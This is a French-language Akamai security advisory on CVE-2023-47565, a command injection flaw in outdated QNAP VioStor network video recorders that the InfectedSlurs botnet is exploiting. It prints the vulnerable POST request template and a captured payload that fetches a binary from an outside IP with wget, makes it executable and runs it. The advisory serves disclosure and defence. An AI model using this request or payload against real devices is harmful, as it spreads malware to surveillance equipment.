Vous avez besoin du Cloud Computing ? Commencez dès maintenant

Vulnérabilité activement exploitée dans les enregistreurs vidéo en réseau VioStor de QNAP : corrigée, correctifs disponibles

Akamai Wave Blue

écrit par

Chad Seaman et Larry Cashdollar

December 14, 2023

Chad Seaman headshot

écrit par

Chad Seaman

Chad Seaman est chercheur principal en sécurité et chef de l'équipe Security Intelligence Response Team d'Akamai. Il se définit fièrement comme un « explorateur de l'Internet » et aime fouiller dans ce qu'il y trouve. Chad a commencé sa carrière en tant que programmeur et, après avoir été confronté à la sécurité, à l'exploitation et aux analyses par le biais d'enquêtes sur les violations, la sécurité est rapidement devenue son travail préféré. Il passe maintenant son temps dans les enquêtes sur les programmes malveillants, la rétro-ingénierie , les recherches sur les vulnérabilités, les attaques DDoS et les enquêtes de cybercriminalité. Il aime l'aviation, les armes à feu et passer du temps dans la nature, de préférence dans les bois, sur un sentier, sur son vélo boueux.

Larry Cashdollar

écrit par

Larry Cashdollar

Larry Cashdollar has been working in the security field as a vulnerability researcher for more than 20 years and is currently a Principal Security Researcher on the Security Intelligence Response Team at Akamai. He studied computer science at the University of Southern Maine. Larry has documented more than 300 CVEs and has presented his research at BotConf, BSidesBoston, OWASP Rhode Island, and DEF CON. He enjoys the outdoors and rebuilding small engines in his spare time.

Les systèmes hérités constituent un terrain propice pour la découverte et l'exploitation de nouvelles vulnérabilités afin d'y propager des logiciels malveillants.

Synthèse

À savoir

Dans le cadre de la recherche concernant InfectedSlurs, l'équipe SIRT a identifié une vulnérabilité dans les enregistreurs vidéo en réseau VioStor de QNAP qui est activement exploitée « in the wild ». L'enregistreur vidéo en réseau est une solution de surveillance réseau haute performance pour la surveillance en réseau des caméras IP, de l'enregistrement vidéo, de la lecture et de l'accès aux données à distance. La vulnérabilité a reçu l'ID CVE CVE-2023-47565 avec un score CVSS v3 de 8,0.

Cette vulnérabilité permet à un attaquant authentifié de réaliser une injection de commande du système d'exploitation avec une charge utile fournie via une requête POST à l'interface de gestion. Dans sa configuration actuelle, elle utilise les informations d'identification par défaut du terminal dans les charges utiles capturées.

Les versions suivantes du micrologiciel du NVR VioStor de QNAP sont concernées :

  • NVR VioStor : Versions 5.0.0 et antérieures (5.0.0 publiée le 21 juin 2014)

QNAP considère que ces terminaux ne sont plus pris en charge. Toutefois, le fournisseur recommande une mise à niveau du micrologiciel VioStor vers la dernière version disponible sur les terminaux existants. Ce problème avait déjà été corrigé, bien qu'il n'ait jamais été signalé/divulgué publiquement. En outre, il est recommandé aux utilisateurs de modifier les mots de passe par défaut sur leurs terminaux.

De plus, US-CERT a publié un avis.

Exploitation observée

Au départ, lorsque nous avons examiné les charges utiles d'exploitation lors de la campagne InfectedSlurs, nous n'avions signalé que deux vulnérabilités Zero Day, car l'équipe n'était pas en mesure d'associer l'exploitation observée à un terminal ou à un fabricant. Il était donc difficile de confirmer que l'exploitation était bien de type Zero Day.

Suite à un examen plus approfondi de divers aspects de l'exploitation et de la charge utile, l'équipe SIRT a estimé que les terminaux NVR VioStor de QNAP étaient la cible. Ces terminaux correspondent au profil de ciblage de la campagne et ont été vendus avec des identifiants de connexion par défaut faibles (trouvés dans leurs manuels et observés dans le cadre de l'exploitation). Comme pour les deux premières vulnérabilités Zero Day, les terminaux infectés pourraient faciliter les vulnérabilités d'injection de commande du système d'exploitation dans les paramètres NTP sur les terminaux Internet des objets (IoT) et les NVR affectés.

Ces théories ont été relayées à l'US-CERT, qui s'est alors coordonné avec l'équipe SIRT d'Akamai et QNAP afin d'examiner les preuves et d'aider à confirmer les théories de l'équipe SIRT. Au final, QNAP a confirmé que les charges utiles ciblaient ses terminaux VioStor (lesquels ont fait l'objet d'un retrait et ne sont désormais plus pris en charge), mais uniquement ceux possédant les anciennes versions (5.0.0 ou antérieures) de leur micrologiciel.

Cette vulnérabilité est exploitée par le biais d'une requête POST sur le chemin /cgi-bin/server/server.cgi . L'exécution de code à distance (RCE) existe là où l'argument pour SPECIFIC_SERVER est spécifié (Figure 1).

  URL:
/cgi-bin/server/server.cgi?func=server02_main_submit&counter=8.540406879901406&APPLY=

PAYLOAD:
time_mode=2&time_YEAR=0&time_MONTH=0&time_DAY=0&time_HOUR=0&time_MINUTE=0&time_SECOND=0&enable_rtc=1&TIMEZONE=50&year=&month=&day=&CONFIGURE_NTP=on&SPECIFIC_SERVER=[RCE_PAYLOAD]

Figure 1 : Tentative d'exploitation du RCE par injection de commande

Un exemple de charge utile d'infection capturée est présenté dans la figure 2.

  wget+http://94.156.68.148/zerx86;chmod+777+*;./zerx86+viox86

Figure 2 : Charge utile RCE capturée

Importance des pratiques de sécurité de base

Les bases comptent. Ces observations soulignent une fois de plus l'importance des meilleures pratiques en matière de sécurité de base, telles que la modification des mots de passe par défaut sur les terminaux lors de la configuration initiale. Elles mettent également en évidence l'importance de mettre en œuvre des protocoles de sécurité proactifs à long terme encore plus solides, comme assurer une mise à jour cohérente des systèmes pour se protéger contre les attaques potentielles et vérifier de temps à autre les systèmes/terminaux, surtout s'ils présentent un comportement étrange.

Conclusion

Une fois de plus, notre déploiement d'un réseau de leurre personnalisé a permis d'obtenir des informations précieuses sur les cyberattaques, révélant des vulnérabilités inconnues auparavant. La présence d'identifiants de connexion par défaut et de systèmes réseau obsolètes et non pris en charge est apparue comme une aubaine pour les infections botnet. Les systèmes hérités constituent un terrain propice pour la découverte et l'exploitation de nouvelles vulnérabilités afin d'y propager des logiciels malveillants.

Ce constat souligne l'importance cruciale de renforcer la sensibilisation et la formation concernant les meilleures pratiques de l'IoT, en insistant sur les risques associés pour l'internaute moyen. Le besoin de sensibilisation s'étend au-delà des internautes et s'applique également aux fabricants de ces terminaux. Des cycles de support logiciel plus longs et la sécurité lors de la configuration, comme des changements forcés de mots de passe, sont essentiels pour maintenir la sécurité du système.

Restez à l'écoute

Le groupe Security Intelligence d'Akamai continuera à surveiller ces menaces et à les signaler afin de sensibiliser nos clients et la communauté en général. Pour accéder à d'autres recherches, suivez-nous sur X(ex-Twitter) pour connaître les dernières actualités.

L'équipe SIRT d'Akamai souhaite remercier CISA, US-CERT et QNAP pour leur assistance dans les efforts de communication, de coordination, d'identification, de correction et de divulgation.



Akamai Wave Blue

écrit par

Chad Seaman et Larry Cashdollar

December 14, 2023

Chad Seaman headshot

écrit par

Chad Seaman

Chad Seaman est chercheur principal en sécurité et chef de l'équipe Security Intelligence Response Team d'Akamai. Il se définit fièrement comme un « explorateur de l'Internet » et aime fouiller dans ce qu'il y trouve. Chad a commencé sa carrière en tant que programmeur et, après avoir été confronté à la sécurité, à l'exploitation et aux analyses par le biais d'enquêtes sur les violations, la sécurité est rapidement devenue son travail préféré. Il passe maintenant son temps dans les enquêtes sur les programmes malveillants, la rétro-ingénierie , les recherches sur les vulnérabilités, les attaques DDoS et les enquêtes de cybercriminalité. Il aime l'aviation, les armes à feu et passer du temps dans la nature, de préférence dans les bois, sur un sentier, sur son vélo boueux.

Larry Cashdollar

écrit par

Larry Cashdollar

Larry Cashdollar has been working in the security field as a vulnerability researcher for more than 20 years and is currently a Principal Security Researcher on the Security Intelligence Response Team at Akamai. He studied computer science at the University of Southern Maine. Larry has documented more than 300 CVEs and has presented his research at BotConf, BSidesBoston, OWASP Rhode Island, and DEF CON. He enjoys the outdoors and rebuilding small engines in his spare time.